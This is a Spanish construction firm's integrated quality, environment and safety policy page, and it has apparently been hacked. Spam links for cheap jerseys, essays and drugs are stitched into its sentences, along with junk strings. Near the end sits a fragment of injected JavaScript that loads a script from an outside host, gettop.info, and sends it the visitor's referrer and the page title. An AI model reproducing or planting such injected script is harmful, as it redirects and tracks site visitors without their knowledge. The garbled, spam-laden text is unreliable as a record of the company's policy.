X

Gestión integrada

jtu

Política de Gestión Integrada

cheap jerseys
cheap nfl jerseys
cheap nfl jerseys
cheap jerseys china
cheap nfl jerseys

PAS Infraestructuras y Servicios, S.L. es una empresa cheap college essays encuadrada dentro del sector de la construcción. Tenemos por objeto la ejecución de obras públicas y privadas, la explotación de áridos, balasto y plantas de suelo/grava-cemento y de aglomerado asfáltico en caliente. En general, realizamos todas las actividades necesarias para la ejecución de las obras. En nuestro camino hacia la EXCELENCIA EMPRESARIAL, hemos implantado un sistema de gestión integrado, con el que buscamos superar las expectativas de nuestros clientes y mejorar nuestros resultados, a través de la calidad del servicio, el respeto al medio ambiente y la seguridad y salud de nuestros trabajadores. Para conseguir todo esto, nos buy custom essay online apoyaremos en las normas UNE-EN ISO 9001, UNE-EN ISO 14001 y OHSAS 18001.

55555
best price for colchicine. La calidad, que es un factor clave que deber servir de base para conseguir la fidelidad de nuestros clientes.

cheap sarafem medication

El compromiso de cumplir con los requisitos de las normas de referencia, de mejorar continuamente la eficacia del sistema de gestión y el desempeño, de la seguridad y salud de los trabajadores y de prevenir los daños y el deterioro de la salud.
Cumplir con los requisitos legales aplicables y con otros requisitos que la organización suscriba, prestando especial atención a los relacionados con la calidad, los aspectos ambientales y la seguridad y salud de los trabajadores.
El respeto y la protección de derechos fundamentales como el derecho a la vida, la integridad física y la salud de los trabajadores, así como la protección del medio ambiente, apoyando el desarrollo sostenible.
Dotar a la Empresa de una plantilla de profesionales capacitados en las distintas tareas desarrolladas, que además serán conscientes de la necesidad de la calidad y del respeto al medio ambiente en todos los trabajos que realicen, adquiriendo todos el compromiso de prevenir la contaminación y los riesgos laborales derivados de nuestra actividad.
Y, por último, tenemos establecidos los principios que han de presidir los comportamientos de nuestros trabajadores, a través del Código de Conducta, documento público y de libre acceso para todos los grupos de interés.La calidad, que es un factor clave que deber servir de base para conseguir la fidelidad de nuestros clientes.
passssssDD

online

Cheap

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {

topspyapps.net